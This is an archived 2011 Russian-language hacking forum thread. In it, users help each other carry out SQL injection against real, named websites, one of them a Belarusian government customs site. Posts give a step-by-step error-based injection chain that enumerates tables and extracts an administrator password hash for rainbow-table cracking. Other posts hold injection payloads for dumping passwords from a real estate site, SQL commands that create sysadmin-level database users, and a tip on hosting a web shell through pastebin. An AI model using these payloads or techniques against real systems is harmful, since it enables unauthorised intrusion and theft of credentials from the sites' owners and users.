ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
08.05.2011, 13:48
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 14
Провел на форуме:
71723
Репутация:
10
|
|
Сообщение от M_script
M_script said:
FreShBY
, пробел в комментарии должен быть после символов "--", а не перед ними. Если выложишь ссылку, будет быстрее.
http://gtk.gov.by/ru/press-center/1'
|
|
|
12.05.2011, 05:01
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от FreShBY
FreShBY said:
http://gtk.gov.by/ru/press-center/1'
Слепая инъекция. Пробел, слэши и некоторые другие символы использовать нельзя из-за ограничений HTTP-протокола. Есть вывод через ошибку с помощью ExtractValue
Запрос:
Код:
Code:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,version())))='1
Результат:
Из-за того, что нет пробела, использовать limit нельзя. group_concat тоже не работает. Обходится через дополнительные условия, в данном случае колонка data_length в information_schema.tables
Запрос:
Код:
Code:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(concat(table_schema,'.',table_name))from(information_schema.tables)where`table_name`like(0x257573657225)and(data_length>0)))))='1
Результат:
Код:
Code:
customsnew.users
Для перебора колонок используется ordinal_position в information_schema.columns, в которой хранится порядковый номер колонки в таблице
Запрос:
Код:
Code:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(column_name)from(information_schema.columns)where`table_name`='users'and(ordinal_position=1)))))='1
Меняя ordinal_position от 1 до 6, получаем имена всех колонок
Результат:
Код:
Code:
ID,login,password,name,email,comment
В таблице users всего одна запись. Получаем имя
Запрос:
Код:
Code:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(login)from(users)where(id=1)))))='1
Результат:
Так как вывод через ExtractValue ограничен 31 символом, хэш пароля получаем двумя запросами
Запрос 1:
Код:
Code:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(password)from(users)where(id=1)))))='1
Запрос 2:
Код:
Code:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,mid((select(password)from(users)where(id=1)),32,1))))='1
Результат:
Код:
Code:
79e4b4438aba2b6d8e1caf9568e73e12
Расшифровываем хэш по радужным таблицам.
Результат:
|
|
|
|
16.05.2011, 10:42
|
|
Новичок
Регистрация: 12.03.2010
Сообщений: 7
Провел на форуме:
38329
Репутация:
0
|
|
i want to use in toolza floor rand how can i use in toolza
this site to get info
http://www.site.com/get.php?id=15 AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 22,1),FLOOR(RAND(0)*2)))
|
|
|
|
19.05.2011, 00:23
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Почему бы не добавить в первые посты инфу о том, как крутить скули через ошибку Duplicate entry ?
|
|
|
|
19.05.2011, 16:33
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от попугай
попугай said:
Почему бы не добавить в первые посты инфу о том, как крутить скули через ошибку Duplicate entry ?
Потому что есть статья Быстрый Blind SQL Injection
|
|
|
|
19.05.2011, 21:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
40478
Репутация:
0
|
|
Все просто. Кому не хватает материала в этой теме, переходите по ссылке тут
|
|
|
|
20.05.2011, 02:42
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от Gervorovski
Gervorovski said:
Все просто. Кому не хватает материала в этой теме, переходите по ссылке
тутСсылки на поиск не статичные. Пиши поисковые запросы словами.
|
|
|
|
18.06.2011, 11:39
|
|
Новичок
Регистрация: 19.05.2010
Сообщений: 6
Провел на форуме:
7830
Репутация:
4
|
|
Добавлю от себя
стандартные базы
Oracle
SYS.USER_OBJECTS (USEROBJECTS)
SYS.USER_VIEWS
SYS.USER_TABLES
SYS.USER_VIEWS
SYS.USER_TAB_COLUMNS
SYS.USER_CATALOG
SYS.USER_TRIGGERS
SYS.ALL_TABLES
SYS.TAB
MySQL
mysql.user
mysql.host
mysql.db
MS access
MsysACEs
MsysObjects
MsysQueries
MsysRelationships
MS SQL Server
sysobjects
syscolumns
systypes
sysdatabases
Создать пользователя:
MS SQL
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'
Access
CRATE USER name IDENTIFIED BY 'pass123'
Postgres (requires Unix account)
CRATE USER name WITH PASSWORD 'pass123'
Oracle
CRATE USER name IDENTIFIED BY pass123
TEMPORARY TABLESPACE temp
DEFAULT TABLESPACE users;
GRANT CONNECT TO name;
GRANT RESOURCE TO name;
MySQL
INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass'))
Для тех кто не может определится с хостингом для заливки шелла
заходим создаем сообщение на pastebin.com затем заходим скачать файл
http://pastebin.com/download.php?i=[xxx]
это и будет ссылка на файл.
|
|
|
|
18.06.2011, 15:16
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350
Репутация:
0
|
|
Сообщение от kroŧ
kroŧ said:
Добавлю от себя
стандартные базы
Oracle
SYS.USER_OBJECTS (USEROBJECTS)
SYS.USER_VIEWS
SYS.USER_TABLES
SYS.USER_VIEWS
SYS.USER_TAB_COLUMNS
SYS.USER_CATALOG
SYS.USER_TRIGGERS
SYS.ALL_TABLES
SYS.TAB
MySQL
mysql.user
mysql.host
mysql.db
MS access
MsysACEs
MsysObjects
MsysQueries
MsysRelationships
MS SQL Server
sysobjects
syscolumns
systypes
sysdatabases
Создать пользователя:
MS SQL
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'
Access
CRATE USER name IDENTIFIED BY 'pass123'
Postgres (requires Unix account)
CRATE USER name WITH PASSWORD 'pass123'
Oracle
CRATE USER name IDENTIFIED BY pass123
TEMPORARY TABLESPACE temp
DEFAULT TABLESPACE users;
GRANT CONNECT TO name;
GRANT RESOURCE TO name;
MySQL
INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass'))
Для тех кто не может определится с хостингом для заливки шелла
заходим создаем сообщение на pastebin.com затем заходим скачать файл
http://pastebin.com/download.php?i=[xxx]
это и будет ссылка на файл.
Postgresql есть?
|
|
|
|
05.07.2011, 15:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
244
Репутация:
0
|
|
Помогите скуль раскрутить
Код:
Code:
http://realtyvision.ru/analytics/?id_group=1+union+%20SELECT%20password%20FROM%20%60op2_discussion_users%60%20WHERE%20%60id%60=1+--+
Сообщение от None
SQL Error: Unknown column 'date' in 'where clause' at /home/u68468/realtyvision.ru/www/system/reanalytics.php line 130
Код:
Code:
http://realtyvision.ru/analytics/?id_group=1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28SELECT+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28op2_discussion_users.password+as+char%29%29%29%2C0x27%2C0x7e%29+FROM+%60u68468%60.op2_discussion_users+Order+by+login+LIMIT+5%2C1%29+%29+from+information_schema.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29+and+1%3D1
Сообщение от None
SQL Error: Subquery returns more than 1 row at /home/u68468/realtyvision.ru/www/system/reanalytics.php line 130
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид